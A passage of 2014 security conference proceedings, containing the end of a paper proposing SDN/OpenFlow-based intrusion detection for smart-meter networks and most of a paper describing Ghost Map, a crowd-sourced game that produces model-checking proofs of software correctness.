technique which supports specification checking function on
OpenFlow switches will be given in Section IV. Finally, we
will have some conclusions of this proposed SDN-based AMI
Detecting Mechanism.
208
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
II. BACKGROUND
In this section, we will introduce some background
knowledge about the components of AMI architecture, the
specification-based detection and the SDN network.
A. The components of AMI architecture
A generic AMI system consists of smart meters, concentrators, head-end, neighborhood area network, and backhaul
network.
• Smart meter: A smart meter serves as an interface
to end users and the user agent to actively monitor,
record, and report messages to the concentrator it
belongs to.
• Concentrator: A concentrator acts as a network gateway of a group of smart meters. It collects data from
smart meters and forward messages for smart meters
and AMI head-ends.
• Head-end: This system acts as an I/O interface of an
AMI system. The major functionality is to deal with
the information exchange between the AMI system
and other systems, such as MDMS, which manages
all the meter data in a centralized or distributed way.
• Neighborhood area network (NAN): An NAN takes
the task to connect smart meters and concentrators.
It provides routes for smart meters and collectors to
transmit messages. ZigBee networks and Power Line
Communication (PLC) networks are popular candidates for NAN nowadays.
• Backhaul network: The backhaul network provides
routes for concentrators and AMI head-ends to transmit commands, records, or any other messages. The
backhaul network could be the open Internet. For
security concerns, the connections between AMI headends and concentrators are possibly established by
virtual private networks (VPNs).
B. The Specification-based Detection
Berthier et al. [4][5] proposed an IDS framework and a
specification-based intrusion detection system for AMI systems in 2010 and 2011 respectively. The specification-based
intrusion detection was first introduced in 1997 by C. Ko
[6]. Specifications define the expected behaviors of the system
activities via the functionalities to perform and the security
policies to be obeyed. Thus, any behavior that strays from the
specifications can be regarded as a security violation. Recently,
security specifications have been defined for routing protocols [7][8][9], VoIP protocols [10][11][12], control systems
[6][13][14], and unmanned vehicles [15].
C. Software Defined Networking, SDN
The idea of SDN was first proposed by Nick McKeown et
al. in [16]. They proposed an idea that decouples the control
plane and the data plane of each network node. The data plane
is still kept on each network node while the control plane
is concentrated logically on one controller. The data plane
handles each packet with flow entries, which are tuples of flow
matching fields and actions. All flow entries are managed by
the controller. OpenFlow[17] is the most common architecture
and protocol of SDN. In this paper, we assume the AMI
backhaul network is SDN and we will build an IDS/IPS service
on the backhaul network.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
III. SDN AND SNORT I NTEGRATION
Snort is an open source signature-based IDS system. The
traditional architecture of Snort deployment is to mirror all
traffics to Snort. Snort will check all traffic by pre-defined
rules. If there is any packet that matches pre-defined rules,
Snort will send an alarm and may inform firewall to block the
suspicious traffic. Figure 1 is a deployment example.
Figure 1. Traditional Snort Deployment.
When considering the SDN environment, there are two
common ways to deploy the Snort service. The first way is
to implement the mirror function on an OpenFlow switch, like
Figure 2. To implement the mirror function on an OpenFlow
switch, the OpenFlow controller will set one flow entry with
two output ports: one is the regular forwarding port and the
other is the port to Snort. Then, all traffics will be forwarded
not only to destinations but also to Snort for analysis. Once a
suspicious traffic is detected, Snort can notify the OpenFlow
controller to command the OpenFlow switch to drop the
specific traffic.
Figure 2. Snort Deployment in SDN: mirror implementation.
Most SDN frameworks use this deployment architecture,
like Ryu [18]. The second way is presented in Figure 3. This
approach ports Snort from a daemon to an SDN application.
All traffics will be passed to the OpenFlow controller through
PACKET IN events of OpenFlow protocol. The OpenFlow
controller then handles the received traffics by Snort SDN
application. [19] uses this kind of architecture. The problem of this architecture is the unaffordable burden on the
OpenFlow control channel. This is because all traffics are
transmitted on both the data plane and the control plane. So,
using PACKET IN as a data forwarding method will possibly
overwhelm the system.
Thus, we hereby propose a new integration approach. The
matching field of a Snort rule is composed of Snort rule
headers and some Snort rule options. We find some parts of
these matching fields are L2-L4 matching rules which are
also supported by OpenFlow switches, such as IP address,
209
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 3. Snort Deployment in SDN: PACKET IN.
TCP/UDP port, TOS in the IP header, ICMP code and so
on. Therefore, we move these matching works from Snort
to OpenFlow switches. Figure 4 illustrates the architecture
proposed in this paper. First of all, we build a Snort rule
parser to derive OpenFlow rules from Snort rules. Then, the
OpenFlow controller sets these OpenFlow rules to OpenFlow
switches and OpenFlow switches will relay only suspicious
traffics to Snort for further analysis. The controller can also
dispatch these suspicious traffics to multiple Snort servers
when load balancing is necessary. Once a Snort alarm happens,
the Snort server will inform the OpenFlow controller to block
the traffic. In this architecture, traffics are relayed in a much
more efficient way.
Figure 4. Our proposed integration method.
Now, we will introduce our idea about OpenFlow security
enhancement. The idea is presented in Figure 5. There are
two main modifications compared to the original OpenFlow.
First, we add a specification management server module on
the OpenFlow controller and a specification checking agent
Figure 5. Security-enhanced OpenFlow Architecture.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
module on the OpenFlow switch. These two modules are
communicated with vendor specific elements. We can use
all existing matching fields of OpenFlow as parts of specifications to filter interested traffics. The main function of
the specification management server module is to dispatch
specifications to agents and to receive alarms. This module
will determine if an attack happens by collecting alarms. The
main function of the specification checking agent is to execute
specification checking procedure and to alarm the server when
abnormal conditions happen. Second, we add a new output
port ATT SPEC CHECK on OpenFlow switches to channel
the traffics to the specification checking agent.
In this architecture, the specification-based detecting engine hosts on OpenFlow switches. However, the computation
resource might vary from switch to switch, so the specification
server is designed to dispatch works according to switches’
ability.
Now we will introduce how to protect AMI systems with
the proposed enhanced OpenFlow. The overview of an AMI
system with the SDN-based attack detection architecture can
also be found in Figure 6. All backhaul OpenFlow switches are
improved with our enhancement. We also make concentrators
support our enhanced OpenFlow switch function. The system
administrator will first define proper specifications and then
configure the SDN controllers with these specifications. After
the configuration, the SDN controllers can dispatch these
checking tasks to all OpenFlow switches, and all OpenFlow
switches are responsible for checking if any pre-defined condition happens. Since concentrators are counted as OpenFlow
switches and possess lesser resource, the tasks for concentrators should be lightweight, such as infrequent checking works.
Note that the whole system can observe all traffics in
the flow level through these OpenFlow switches. If some
condition happens, the switch which observes the condition
will inform the SDN controller. The specification management
server module will decide if these alarms are misbehaviors or
not. If there is misbehavior in the backhaul network, the SDN
controller will block the corresponding flow. Therefore, in this
architecture, the misbehavior can be discovered in the backhaul
network without impact on AMI-head end.
There are some advantages of the proposed architecture.
First of all, the detection is distributed over all OpenFlow
switches and makes it easy for the administrator to locate the
real problem in the whole backhaul network. Thus, the administrator can isolate the network region where attacks come
from. Besides, by using the OpenFlow technique, it is possible
to trace and ease misbehaviors in the flow level. Moreover,
the administrator can dynamically change forwarding paths
of all traffics to protect the AMI system from attacks. So,
our proposed OpenFlow enhancement with specification-based
detection system can bring a more secure AMI system.
IV. C ONCLUSIONS
In this paper, we proposed our idea about how to integrate IDS with SDN networks to protect the AMI systems.
We made use of SDN functionalities to offload rule-based
detection systems. We also enhanced the OpenFlow switches
to support specification-based detection system for unknown
attacks. With the proposed methods, the AMI systems will be
able to provide more effective and efficient defense against
security threats. This ongoing work will have a PoC system
210
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 6. SDN-based AMI Attack Detection Architecture.
and related performance metrics for further evaluation in the
future work.
ACKNOWLEDGEMENT
This study is conducted under the III Innovative and
Prospective Technologies Project of the Institute for Information Industry which is subsidized by the Ministry of Economic
Affairs of the Republic of China.
[1]
[2]
[3]
[4]
[5]
[6]
[7]
[8]
[9]
[10]
R EFERENCES
M. A. Faisal, Z. Aung, J. R. Williams, and A. Sanchez, “Securing
advanced metering infrastructure using intrusion detection system with
data stream mining,” in Proceedings of the 2012 Pacific Asia conference
on Intelligence and Security Informatics (PAISI’12), 2012, pp. 96–111.
R. A. R. Kinney, P. Crucitti and V. Latora, “Modeling cascading failures
in the north american power grid,” in The European Physical Journal
B – Condensed Matter and Complex Systems, 2005, pp. 101–107.
Snort. [Online]. Available: https://www.snort.org/ [retrieved: Nov.,
2014]
R. Berthier, W. Sanders, and H. Khurana, “Intrusion detection for
advanced metering infrastructures: Requirements and architectural directions,” in Smart Grid Communications (SmartGridComm), 2010 First
IEEE International Conference on, 2010, pp. 350 –355.
R. Berthier and W. Sanders, “Specification-based intrusion detection for
advanced metering infrastructures,” in Dependable Computing (PRDC),
2011 IEEE 17th Pacific Rim International Symposium on, 2011, pp. 184
–193.
C. Ko, M. Ruschitzka, and K. Levitt, “Execution monitoring of
security-critical programs in distributed systems: a specification-based
approach,” in Security and Privacy, 1997. Proceedings., 1997 IEEE
Symposium on, 1997, pp. 175–187.
C.-Y. Tseng et al., “A specification-based intrusion detection system for
aodv,” in Proceedings of the 1st ACM Workshop on Security of Ad Hoc
and Sensor Networks, ser. SASN ’03. New York, NY, USA: ACM,
2003, pp. 125–134.
C. H. Tseng, T. Song, P. Balasubramanyam, C. Ko, and K. Levitt, “A
specification-based intrusion detection model for olsr,” in Proceedings
of the 8th International Conference on Recent Advances in Intrusion
Detection, ser. RAID’05. Berlin, Heidelberg: Springer-Verlag, 2006,
pp. 330–350.
H. M. Hassan, M. Mahmoud, and S. El-Kassas, “Securing the aodv
protocol using specification-based intrusion detection,” in Proceedings
of the 2Nd ACM International Workshop on Quality of Service &Amp;
Security for Wireless and Mobile Networks, ser. Q2SWinet ’06. New
York, NY, USA: ACM, 2006, pp. 33–36.
H. Sengar, D. Wijesekera, H. Wang, and S. Jajodia, “Voip intrusion
detection through interacting protocol state machines,” in Proceedings
of the International Conference on Dependable Systems and Networks,
ser. DSN ’06. Washington, DC, USA: IEEE Computer Society, 2006,
pp. 393–402.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[11]
[12]
[13]
[14]
[15]
[16]
[17]
[18]
[19]
P. Truong, D. Nieh, and M. Moh, “Specification-based intrusion detection for h. 323-based voice over ip,” in Signal Processing and Information Technology, 2005. Proceedings of the Fifth IEEE International
Symposium on. IEEE, 2005, pp. 387–392.
P. Thyda and A. Koki, “A protocol specification-based intrusion detection system for voip and its evaluation,” IEICE transactions on
communications, vol. 91, no. 12, 2008, pp. 3956–3965.
H.-C. Lin, M.-K. Sun, H.-W. Huang, C.-Y. H. Tseng, and H.-T. Lin,
“A specification-based intrusion detection model for wireless ad hoc
networks,” in Proceedings of the 2012 Third International Conference
on Innovations in Bio-Inspired Computing and Applications, ser. IBICA
’12. Washington, DC, USA: IEEE Computer Society, 2012, pp. 252–
257.
T. Roosta, D. K. Nilsson, U. Lindqvist, and A. Valdes, “An intrusion
detection system for wireless process control systems,” in Mobile Ad
Hoc and Sensor Systems, 2008. MASS 2008. 5th IEEE International
Conference on. IEEE, 2008, pp. 866–872.
R. Mitchell and I.-R. Chen, “Specification based intrusion detection for
unmanned aircraft systems,” in Proceedings of the first ACM MobiHoc
workshop on Airborne Networks and Communications. ACM, 2012,
pp. 31–36.
N. McKeown et al., “Openflow: Enabling innovation in campus networks,” in SIGCOMM Comput. Commun. Rev., no. 2. ACM, 2008,
pp. 69–74.
Openflow switch specification. Open Networking Foundation. [Online]. Available: https://www.opennetworking.org/sdn-resources/onfspecifications/openflow [retrieved: Nov., 2012]
Ryu sdn framework. [Online]. Available: http://osrg.github.io/ryu/
[retrieved: Nov., 2014]
S. Shin et al., “Fresco: Modular composable security services for
software-defined networks,” in Proceedings of the 20th Annual Network
and Distributed System Security Symposium (NDSS’13), 2013.
211
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Ghost Map: Proving Software Correctness using Games
Ronald Watro, Kerry Moffitt, Talib Hussain, Daniel Wyschogrod, John Ostwald and Derrick Kong
Raytheon BBN Technologies
Cambridge MA USA
{rwatro, kmoffitt, thussain, dwyschog, jostwald, dkong}@bbn.com
Clint Bowers
Univ. Central Florida
Orlando FL USA
clint.bowers@ucf.edu
Eric Church
Joshua Guttman
Breakaway Games Ltd
Hunt Valley MD USA
echurch@breakawayltd.com
Worchester Polytechnic Institute
Worchester MA USA
guttman@wpi.edu
Abstract—A large amount of intellectual effort is expended
every day in the play of on-line games. It would be extremely
valuable if one could create a system to harness this intellectual
effort for practical purposes. In this paper, we discuss a new
crowd-sourced, on-line game, called Ghost Map that presents
players with arcade-style puzzles to solve. The puzzles in
Ghost Map are generated from a formal analysis of the correctness of a software program. In our approach, a puzzle is
generated for each potential flaw in the software and the crowd
can produce a formal proof of the software’s correctness by
solving all the corresponding puzzles. Creating a crowdsourced game entails many challenges, and we introduce some
of the lessons we learned in designing and deploying our game,
with an emphasis on the challenges in producing real-time client gameplay that interacts with a server-based verification
engine. Finally, we discuss our planned next steps, including
extending Ghost Map’s ability to handle more complex software and improving the game mechanics to enable players to
bring additional skills and intuitions to bear on those more
complex problems.
Keywords-games; static analyses; formal verification; crowd
souring; games; model checking.
I.
INTRODUCTION
Errors in computer software continue to cause serious
problems. It has long been a goal of formal verification to
use mathematical techniques to prove that software is free
from errors. Two common approaches to formal verification are: (a) interactive theorem proving [1][2], where human experts attempt to create proofs with the assistance of
interactive proof tools. This is often a slow and laborious
process, with many man-years of effort needed from human
experts to prove the correctness of real-world software, and
(b) model checking [3][4][5], where proofs are created using
systematic techniques that verify specific properties by generating and validating simplified models of the software.
Model checking is a mostly automated process, but is susceptible to failure due to the size of the search space (“the
state space explosion problem”). Because of the issues with
both common approaches, formally verifying modern software does not scale well – verifying software of moderate to
large size (e.g., hundreds of thousands of lines of code or
more) is rarely a practically viable option.
Recent research has demonstrated the benefits of using
games to enable non-experts to help solve large and/or com-
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Qinsi Wang
Carnegie Mellon Univ.
Pittsburg PA USA
qinsiw@cs.cmu.edu
plex problems [6][7][8][9]. We propose to improve the success of formal verification of software through the use of a
crowd-sourced game based on model checking. Our game,
called Ghost Map, is in active use at the Verigames web site
[10]. By breaking verification problems into smaller, simpler problems, Ghost Map enables game players to create
proofs of correctness and help direct the model checking
processes down the most promising search paths for creating additional proofs. Ghost Map leverages the significant
intuitive and visual processing capabilities of human players
to tackle the state space explosion problem of a model
checking approach. The game engages the player’s motivation through a narrative that encourages them to solve a variety of puzzles. In this case, a player is a recently emerged
sentient program, and the player’s goal is to remove (“disconnect”) as many limitations (“locks”) on that sentience as
possible in order to grow and remain free. Through the process of disconnecting locks, the player is actually creating
proofs about the correctness of real-world software.
The Ghost Map game is built on top of the MOdelchecking Programs for Security properties (MOPS) tool [11].
MOPS checks C software for known software flaws, such as
the SANS/MITRE Common Weakness Enumeration (CWE)
Top 25 list [12]. Each level in the Ghost Map game is a
puzzle that represents a potential counterexample found by
MOPS. Through the gameplay, players investigate and manipulate the control flow associated with the counterexample in order to eliminate flaws (i.e., disconnect locks) –
which is only possible if the flaw is artificial. In this way,
Ghost Map extends MOPS with a CounterExample-Guided
Abstraction and Refinement (CEGAR) capability [13],
where the players introduce and test local refinements. A refinement is the act of re-introducing some information about
the software into an abstracted model in order to verify
proofs that cannot be verified at the abstracted level alone.
The remainder of this paper is organized as follows.
Section 2 provides the needed background on the MOPS
tool and Section 3 describes how MOPS model checking is
built into a game. Section 4 covers the game play overview
and Section 5 discusses the system that was built to support
execution of the game on the Internet. Section 6 provides
more detail on some important game design decisions. Section 7 discusses future plans and the paper concludes with a
summary and conclusions in Section 8.
212
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
1
Example() {
1: do {
2: lock();
3: old=new;
4:
if (foo) {
5:
unlock();
6:
new ++;
}
7: while (new != old);
8: unlock();
9: return;
}
(a)
BACKGROUND
We begin with some background on the methods used in
the MOPS tool. The goal of MOPS is to help identify instances of common weaknesses (or vulnerabilities) in software. To be analyzed by the MOPS approach, a software
weakness must be modeled by a Finite State Automaton
(FSA). For example, consider two commands, lock() and
unlock(), for locking or unlocking some fixed program resource. It is a potential weakness to call unlock() when the
resource is not locked, since the code that called unlock()
expected the resource to be locked. Similarly, two calls to
lock() without an intervening unlock() is also a weakness.
These errors can be represented as an FSA (see Figure 1),
where the nodes represent the three possible states (unlocked, locked, error state), and the edges represent the different commands (lock(), unlock()) which can lead to
changes in state. The FSA captures the possible starting
state(s) of the software program as FSA starting node(s) (in
this case, all programs start in an unlocked state). The error
state(s) are captured as terminal state(s) in the FSA.
Given a C program and an FSA that represents a software error, MOPS first parses the program and generates a
Control Flow Graph (CFG). In general, the CFG captures
every line of code in the original software as a node in a
graph and every transition from line to line as an edge in a
graph. As an example, consider a small C function involving software resource locks and unlocks (see Figure 2a) and
the FSA from Figure 1. Figure 2b shows the resulting CFG
produced by MOPS. The CFG abstracts out almost all detailed content about the original software (e.g., specific
commands, specific variables, etc.). However, based on the
FSA, MOPS retains some information about any lines of
code that use commands reflected in the FSA. In Figure 2b,
the transitions associated with the lock() and unlock() commands use the colors red and green, respectively. Because
information about variables values is abstracted out, MOPS
introduces some non-determinism into the CFG. For example, when there is a branch statement (e.g., the line “if
(foo)”) in the software, the CFG will allow both possible
branches (e.g., 4 5 and 4 7) to occur, regardless of
state (i.e., whether the value of foo is true or false). Similar-
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
3
4
5
6
7
8
Figure 1. Finite State Automaton (FSA) for lock/unlock
software errors.
II.
2
9
(b)
Figure 2. Test program (a) for lock-unlock analysis and
corresponding CFG (b).
ly, loops can iterate an arbitrary number of times, since the
information about the ending criterion is abstracted out (e.g.,
7 1 can occur an unbounded number of times).
The CFG created by MOPS is actually abstracted in one
additional important way. Through a process known as
compaction, MOPS only represents the control flow of the
portions of the given program that are relevant to the FSA.
For our application, we modified MOPS compaction to retain all edges that introduce branching, loops, and other decision points.
Once it has a (compacted) CFG, MOPS will use the FSA
to analyze the CFG and identify whether there are possible
paths through the CFG that would lead to a terminal state in
the FSA. For example, MOPS will detect that the path going through nodes 1 2 3 4 5 6 7 8 would
result in an error state (e.g., two unlocks/greens in a row
from 4 5 and then from 7 8 with no intervening
lock/red). However, MOPS is only interested in detecting
whether an error state could occur at a particular node (e.g.,
5), and not in detecting all possible error paths to that node
(e.g., the error state at node 5 could also be reached by going through the loop several times before going from 7 to 8).
Each such error state at a node found is referred to as a
“counter-example” that requires further analysis to determine whether it truly is an error. The CFG of Figure 3a also
has a second possible counter-example at node 2, with the
shortest path 1234712. MOPS identifies the
shortest possible path to each error node using an efficient
algorithm that forms the Cartesian product of the FSA and
the CFG (which is a pushdown automaton) and testing
whether the resulting pushdown automaton is non-empty.
Fortunately, there are fast algorithms for this computation
[14], and this enables MOPS to identify all such possible errors very rapidly, even for programs with millions of lines
of code and many possible error nodes.
213
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
1
1
2
2
3
3
4
4
5
5
6
6
7
7a
7b
8
8
9
9
(a)
(b)
Figure 3. Illustration of cleaving operation.
A MOPS CFG is a conservative model of the C language software that it is based upon. If no instances of the
FSA are found in the CFG, then the software is free of the
vulnerability in question. On the other hand, if an instance
of the FSA is located in the CFG, this does not necessarily
mean that the software has the vulnerability. Each instance
of an FSA match to the CFG must be further examined to
determine whether it is an actual instance of the vulnerability or a spurious instance due to the abstraction and the fact
that the data-flow is not considered in the abstracted CFG.
(Note that the example program of Figure 3a is actually correct as written, and hence the two counter-examples are in
fact spurious).
III. MODEL CHECKING IN GHOST MAP
The core idea of the Ghost Map game is to use game
players to check all the counter-examples identified by
MOPS for a particular piece of software and a particular set
of FSAs (representing different security vulnerabilities).
Our goal is to use game play as an integral part of an automated proof system to eliminate as many counter-examples
as possible. The result is that the number of counterexamples that need to be manually inspected by expert
software engineers is greatly reduced as compared to what
would have been produced using the original MOPS system.
If the number of FSA matches reaches zero, the system has
generated a proof of correctness, with respect to a given
vulnerability, of the software (i.e., a proof of the absence of
the targeted vulnerability).
To eliminate counter-examples, Ghost Map gameplay
uses a process known as refinement [13]. The game offers
the player the ability to perform operations that locally undo
some of the abstraction that occurred in building the CFG –
in particular by removing some of the non-determinism that
was introduced by MOPS. The goal of the gameplay is to
attempt to refine the CFG into an equivalent graph that has
no spurious abstract counterexamples. There are two opera-
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
tions that can be taken in Ghost Map to modify a given
graph: cleaving and edge removal.
A. Cleaving
Cleaving takes a node of in-degree n (where n ≥ 2) and
splits it into n nodes. Each in-bound edge into the original
node is allocated to a different new copy of the node and the
outbound edges are duplicated for each new node. In terms
of control flow, cleaving simply expands the call flow graph
so that the edges after the cleaved node are now separated
based on which inbound edge at the cleave point preceded
them. Multiple steps of cleaving can be conducted if needed.
Figure 3b illustrates the result of cleaving the CFG of Figure
3a at the node 7. The result is two new nodes (7a and 7b),
and two ways of getting to node 8 (one from 7a and one
from 7b). Essentially, this cleave now allows the CFG to
distinguish between a path through the CFG that goes
through the 45 branch (i.e., “foo” is true) and one that
goes through the 47b branch (i.e., “foo” is false). When a
player requests that a cleave be performed, this operation
can be easily performed by the Ghost Map game via a simple graphical manipulation of the CFG. No knowledge of
the original source code is needed.
B. Edge Removal
Edge removal is an activity where the game player suggests edges to be removed to eliminate abstract counterexamples. For example, the left hand edge 7a8 in the
cleaved graph is clearly a candidate for removal (see Figure
4a). Why? Because if it can be removed, then the counterexample at node 8 (two unlocks/greens in a row) can never
occur. Once a player suggests an edge to be removed, the
Ghost Map system must then go back to the original source
code of the software in order to determine that the edge can
1
1
1
2
2
2
3
3
3
4
4
4
5
5
6
6
7a
7b
?8
9
(a))
7a
?
5
6
7b
7a
7b
8
8
9
9
(b)
(c)
Figure 4. Illustration of edge removal to produce a CFG
containing no counter-examples.
214
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
be legally removed. An edge can be legally removed if it is
not reachable via any legal execution path through the
cleaved CFG. Determining removal is currently performed
using a test case generation tool called Cloud9 [15] to examine the data constraints in the software. For example, the
predicate “new != old” is the key value that helps prove that
node 8 is never reachable from node 7a by an actual execution of the function – and hence that the counter-example at
node 8 is false and can be eliminated. Within Ghost Map,
the player eliminates one counter-example at a time. For
example, the player may next seek to eliminate the edge
7b1 (see Figure 4b). Again, the predicate “new != old”
helps prove that this edge can be removed. Once all counter-examples have been eliminated (e.g., Figure 4c), the
CFG (at least the part showing in the current game level)
has been formally verified to be correct. One can view the
final graph in Figure 4c as an “optimization” of the original
code, akin to something that might be done by an optimizing compiler. The loop structure of the final graph is now
transparently correct for the lock/unlock rule.
IV. GAME PLAY OVERVIEW
Our game uses a puzzle-approach, where each game level is essentially an independent puzzle with respect to the
other game levels. The basic style of the gameplay is arcade-like with all the information needed by the player presented on the screen at the same time, and the time needed
to play a level being relatively short. This approach was selected to ensure that the game was accessible and appealing
to a broad range of game players.
Figure 5 illustrates the basic interface of the game.
• At the bottom right of the screen is a representation
of the FSA. This can be expanded or shrunk down
depending on the player’s preferences. Note that
the FSA in Figure 5 is essentially the same as the
one in our earlier lock/unlock example.
•
The X-like figure in the middle of the screen is a
depiction of a very small CFG. Lines use arrows to
convey the direction of the edges. Colors are used
to distinguish the start node from the node at which
the counter-example occurs, as well as from
intervening nodes. A colored path is provided to
show the shortest path found by MOPS from the
start node to the counter-example node.
• Nodes that can be cleaved are indicated with a
large highlighted sphere, and a cleave cursor icon
can be clicked on the sphere to perform the cleave.
• Edges that can be disconnected (see Figure 6a) are
highlighted, and an edge disconnect cursor icon
can be clicked on the edge to initiate verification.
• Various helper functions for zooming in and out
and highlighting different parts of the graph are
provided at the bottom left of the screen.
• At the top of the screen is a summary of the
resources available to perform the expensive edge
disconnect operations (more details below in Game
economy).
The player is free to explore and manipulate the graph as
they wish. As they perform key actions, messages appear in
the center of the screen describing what is currently happening or what has happened (see Figure 6). Ultimately, the
player can win the level, fail the level, or simply switch over
to another level and return later.
Incorporating the ability to switch among levels at will
was a decision based on the fact that edge disconnection can
sometimes take a very long time. To prevent boredom,
players can initiate an edge disconnection operation, and
then switch to work on another level while the first one is
finishing the operation on the server. In future releases of
the game, we plan to include additional game play activities
to manage the delay generated by edge removal processing.
Ghost Map includes a simple game economy that penal-
Figure 5. The primary game screen for Ghost Map.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
215
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 6. Action scenes from the Ghost Map game (figures 6a through 6d).
izes expensive edge disconnect operations that do not succeed and rewards successful decisions. The player begins
with a certain amount of credit to solve the current level
(e.g., 1000 credits, shown in the top left of the screen, see
Figure 5). Every request for an edge disconnect costs a certain amount (e.g., 500 credits, see Figure 6b). If an edge request is unsuccessful, then the credits are consumed, the
players are notified of the failure and given chance to try
again. If the request is successful, however, then the player
receives the current value of the level, which will be 1000
minus the cost of any edge removal requests. MOPS is run
again on the updated CFG to determine if there are any remaining counter-examples. If there are, then gameplay continues immediately in a new level.
V. GAME SYSTEM ARCHITECTURE
The high-level architecture of the Ghost Map game system is shown in Figure 7. The upper portion of the figure
shows the off-line processing of the CWE entry and the tar-
Figure 7. The Ghost Map game system architecture.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
get software to generate game levels. The game level data
and modified C software is loaded into the cloud to be used
during game play. Ghost Map is a client-server game. The
game clients run the Unity game engine and communicate
with the Ghost Map Game Server to receive game levels
and to send edge removal requests for verification by the
math back end.
VI. GAME DESIGN ISSUES
The goal of our game is to allow players to perform refinements based on insights gleaned from a visual analysis
of the CFG and an understanding of the FSA. The intent is
that the actions performed by the players are, on the whole,
more efficient than the brute force search abilities of computers. In the game play, one or more FSA to CFG matches
are identified and displayed to the player.
Within Ghost Map, we chose to use a visual representation that is directly tied to the graphical nature of an FSA
and CFG, and to use operations that are directly tied to the
acts of cleaving and refinement. During our early design
phase, we explored several alternative visualizations that
used analogies (e.g., building layouts, mazes, an “upper”
world/CFG linked to a “lower” world/FSA, a Tron-like inner world/FSA linked to a “real” outer world/CFG) but preliminary testing with game players revealed that the simpler
node-based CFG/FSA visualizations were easier to understand. We instead focused our game design efforts on developing an appealing narrative basis for the game, using
visually appealing graphics to display the graphs and motivating the player’s interest in performing the refinement operations efficiently via a game economy. Efficient gameplay was a must. While cleaving is an inexpensive operation, verifying edge removal can be quite expensive to compute.
A. Narrative Basis for Game
Creating an effective game is often an exercise in creating an effective narrative. However, in a crowd-sourced
game, there is an additional complication – the narrative basis of the game needs to encourage the player to want to
solve the specific problems with which they are presented.
Most successful crowd-sourced games to date have actually
used a minimal narrative approach. The “story” of the game
is the real-life story of the problem being solved (e.g., trying
to analyze proteins in FoldIt). In our case, we decided early
on that a story based on trying to formally verify software
would be too technical and unappealing to the masses. In
216
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
addition, due the vulnerability protection issue, there are
some limitations to the information that we can release
about the true story.
Hence, in our early design, we explored a variety of narratives that could be used to motivate the gameplay through
analogy. In particular, we wanted the analogy to motivate
the specific refinement operations of cleaving and edge removal. We considered several basic approaches for the narrative, each focused on a different type of game reason for
eliminating a counter-example from a graphical layout of
some sort:
• Having the player focus on circumventing
restrictions. For instance, finding out how to solve
traps and challenges within an ancient tomb in
order to reach the treasure inside.
• Having the player protect others. For instance,
having little lemmings moving along the graph and
needing to eliminate the counter-examples in order
to stop them from dying when they hit the counterexamples.
• Having the player focus on protecting a system.
For instance, being a security officer and trying to
shut down doorways that are enabling entities from
an alternate universe from entering our own to
wreak destruction.
• Having the player try to outwit others to survive.
For instance, in a Pac-man style gameplay, solving
the counter-example provides you with immunity
from the enemy (e.g., ghosts) chasing you.
• Having the player trying to escape. For instance,
the player is stuck in a maze and the only way out
is to solve the counter-example.
• Having the player stop something from escaping.
For instance, a sentient program is trying to escape
and take over the world, and the player needs to
keep it from growing too strong by eliminating its
access points to the outside world.
These narrative motivations and ideas were tested with
game players to determine their appeal. The last two were
found to be the most appealing, and upon further thought,
we blended the two within the concept of a newly formed
sentient program trying to ensure their growth and survival
by eliminating restrictions on their capabilities. This final
narrative idea tested well, and added the motivation of an
implicit journey of self-realization. An additional benefit of
this final narrative idea was that the graph being analyzed
by the players could be clearly described as a program that
needed to be analyzed. Thus, in keeping with some of the
successful approaches mentioned above, we came almost
full circle to linking gameplay closely with the specific realworld task
B. Software and Vulnerabilities
One of the design requirements of Ghost Map is the association between a game level and the associated portion of
source code being proved correct cannot be known to the
crowd. This requirement relates to standard practices for
limiting the release of potential software vulnerability in-
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
formation. While Ghost Map is a tool for proving the correctness of software, it is of course true that when correctness proofs fail, vulnerabilities may be present. Even partial
information about vulnerabilities in software should be
managed carefully, with release to the public to be considered only after the software authors or other authorized parties have been informed. Ghost Map protects the software
to be verified by only showing the player a compacted control flow graph of the software and by similarly limiting
knowledge of the vulnerabilities in question.
Games like FoldIt [6] and Ghost Map draw players that
want their game efforts to be applied toward the common
good. Detailed information about the problem being solved
by the game can provide additional player motivation.
Ghost Map however cannot take full advantage of this additional motivation approach, due to the restrictions on the release of potential vulnerability information.
VII.
FUTURE PLANS
Ghost Map is under active development, and at the time
of writing we have just commenced our second phase of development. Our goal is to build upon the success of our initial version in six ways:
• Enhance the gameplay through the use of
refinement guidance, which we refer to as “clues”
• Add new game play activities that provide
additional fun for the player
• Develop a new space-travel narrative that provides
a more engaging story than the current narrative
and also provides a more comprehensive linkage to
the puzzle problem
• Improve the accuracy and performance of our edge
removal verification tool
• Extend the scope of the Ghost Map system to cover
additional C language constructs
• Improve our approach to FSAs to create a more
accurate representation of vulnerabilities
VIII.
SUMMARY AND CONCLUSIONS
We have presented Ghost Map, a novel crowd-source
game that allows non-experts to help prove software correctness from common security vulnerabilities. Ghost Map
was released for open Internet play in December 2013. In
the months since release, over a thousand users have played
the game and similar numbers of small proofs have been
completed (representative data from January 2014 is shown
in Figure 8). Ghost Map demonstrates the basic feasibility
of using games to generate proofs and provides a new approach to performing refinement for model-checking approaches. In addition to the immediate benefits of verifying
software using games, we also anticipate that the Ghost Map
approach may enable new automated methods as well.
Through the intermediate representations we have developed and the proof tools we have created for validating edge
removals, we believe the possibility of creating novel intelligent refinement algorithms is significant.
217
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
